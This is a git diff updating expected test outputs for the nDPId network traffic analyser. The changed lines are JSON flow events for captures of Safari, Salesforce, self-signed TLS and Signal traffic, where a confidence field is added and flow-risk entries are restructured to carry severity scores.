+01208{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","total-events-serialized":53}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6019/6019
@@ -59,10 +59,10 @@
 ~~ total active/idle flows...: 7/7
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4803552 bytes
-~~ total memory freed........: 4803552 bytes
-~~ total allocations/frees...: 105609/105609
+~~ total memory allocated....: 4886537 bytes
+~~ total memory freed........: 4886537 bytes
+~~ total allocations/frees...: 107199/107199
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 1187 chars
-~~ json string avg len.......: 744 chars
+~~ json string max len.......: 1213 chars
+~~ json string avg len.......: 757 chars
diff --git a/test/results/salesforce.pcap.out b/test/results/salesforce.pcap.out
index 6e8e6afd5..03f03b34c 100644
--- a/test/results/salesforce.pcap.out
+++ b/test/results/salesforce.pcap.out
@@ -3,10 +3,10 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01221{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}}
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 15/15
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603695 bytes
-~~ total memory freed........: 4603695 bytes
-~~ total allocations/frees...: 99576/99576
+~~ total memory allocated....: 4688648 bytes
+~~ total memory freed........: 4688648 bytes
+~~ total allocations/frees...: 101166/101166
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
-~~ json string max len.......: 1226 chars
-~~ json string avg len.......: 739 chars
+~~ json string max len.......: 1252 chars
+~~ json string avg len.......: 752 chars
diff --git a/test/results/selfsigned.pcap.out b/test/results/selfsigned.pcap.out
index 3c640e7d9..a106559d0 100644
--- a/test/results/selfsigned.pcap.out
+++ b/test/results/selfsigned.pcap.out
@@ -3,9 +3,9 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="}
-00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01140{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","9":"TLS Expired Certificate"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}}
-00761{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","9":"TLS Expired Certificate"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}}
+01032{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605741 bytes
-~~ total memory freed........: 4605741 bytes
-~~ total allocations/frees...: 99579/99579
+~~ total memory allocated....: 4690694 bytes
+~~ total memory freed........: 4690694 bytes
+~~ total allocations/frees...: 101169/101169
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 1145 chars
-~~ json string avg len.......: 696 chars
+~~ json string max len.......: 1416 chars
+~~ json string avg len.......: 818 chars
diff --git a/test/results/signal.pcap.out b/test/results/signal.pcap.out
index f0a33830e..916927d32 100644
--- a/test/results/signal.pcap.out
+++ b/test/results/signal.pcap.out
@@ -1,10 +1,10 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"signal.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
